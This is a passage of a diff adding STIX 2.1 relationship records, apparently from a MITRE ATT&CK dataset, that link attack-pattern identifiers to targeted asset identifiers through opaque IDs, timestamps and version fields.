"attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e98892d6-e036-4140-adbb-2932dba51a19", + "created": "2023-09-28T20:08:09.519Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:08:09.519Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e9b1e6c4-7336-4b4b-ac96-086524fcaee8", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e9c58d48-3dd1-4dff-98bc-710233a6c8b6", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e9e2aa9c-3f5f-4d4f-ad20-c4fffd324750", + "created": "2024-06-27T08:58:46.047Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:58:46.047Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e9f0c942-8b53-4239-a212-beacae1b75fc", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e9fcb7cc-931e-4f40-a53a-11b94bb2c605", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ea022ac4-0c8b-4ad0-a160-14640654df2e", + "created": "2020-02-05T18:59:28.794Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--1b84d551-6de8-4b96-9930-d177677c3b1d", + "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ea025b49-33fb-40cc-aa58-7ce69dd4ea75", + "created": "2024-06-27T09:46:15.343Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:46:15.343Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ea393a65-973a-48dc-aba5-c7a501663d6e", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ea4c02a9-e937-4bb6-91e4-375a4696db24", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ea556284-9c34-4fe6-bc87-6b3f86390a78", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ea774e46-3dcb-4cda-ad99-a012ad8fbb58", + "created": "2020-01-31T12:32:52.545Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--d3046a90-580c-4004-8208-66915bc29830", + "target_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ea8a21c0-4740-400c-a8aa-6c9debc7babb", + "created": "2024-06-27T09:44:45.437Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:44:45.437Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ea99327f-65ea-4cd5-905b-ab4080bd752d", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea4c2f9c-9df1-477c-8c42-6da1118f2ac4", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eaaaa0d9-5fe3-47e1-824f-184b28b5bc97", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eabbe74d-10f3-4c1a-b0a8-e67dea239e23", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eac205a6-271b-4a86-acf3-6f4ddefb82c4", + "created": "2023-09-29T17:38:59.611Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:38:59.611Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eadb4ca5-ee99-4169-a926-95b1ff82e960", + "created": "2023-09-28T20:28:52.768Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:28:52.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eae674f9-10a2-41e6-9cd3-205af8e69d53", + "created": "2023-09-28T20:05:15.314Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:05:15.314Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eaee604e-95c4-497b-821e-1412016b826d", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eaf04a10-4017-4883-a4b9-3ffd07222a04", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eaff3277-ad11-4eb3-9756-869de2b167b6", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eb171086-88e1-4f24-bd7e-c3f8b3c3283b", + "created": "2023-09-28T19:44:09.311Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:44:09.311Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eb1bc69d-ff4e-4e4a-9f5a-a03dbd49055d", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eb1d377d-7b20-4f0a-9538-a756a99f41dc", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--356662f7-e315-4759-86c9-6214e2a50ff8", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eb247216-d936-498f-8dbe-866f69416ee8", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eb3e1b5f-bdf8-4501-8bfe-467a02446694", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eb4de316-4188-45cc-b0d1-6610bb7e7cb7", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eb5310c6-7500-4b16-8ca7-6678c6232001", + "created": "2023-09-29T19:36:38.824Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T19:36:38.824Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eb5d514d-7945-4492-855b-356f01357be4", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eb676725-264e-4862-85c5-922b7e85632b", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eb6e6637-9c7f-4d64-b8a0-b5bb23d56da7", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eb701326-146a-46cd-81a2-2777b30db6b4", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eb826b38-cd81-4ac5-93d8-d53f052e6e65", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eb94613c-f3a6-46ef-af63-d69ee1e5c9eb", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eba2e845-3605-45f8-9267-ab20974cb094", + "created": "2024-06-26T13:53:42.993Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:53:42.993Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ebc9f35c-6f95-4bc0-b8b3-f9b515690fa0", + "created": "2023-09-29T17:09:37.977Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:09:37.977Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ebe23885-fad6-4c90-9bc2-07ac9af2be43", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + 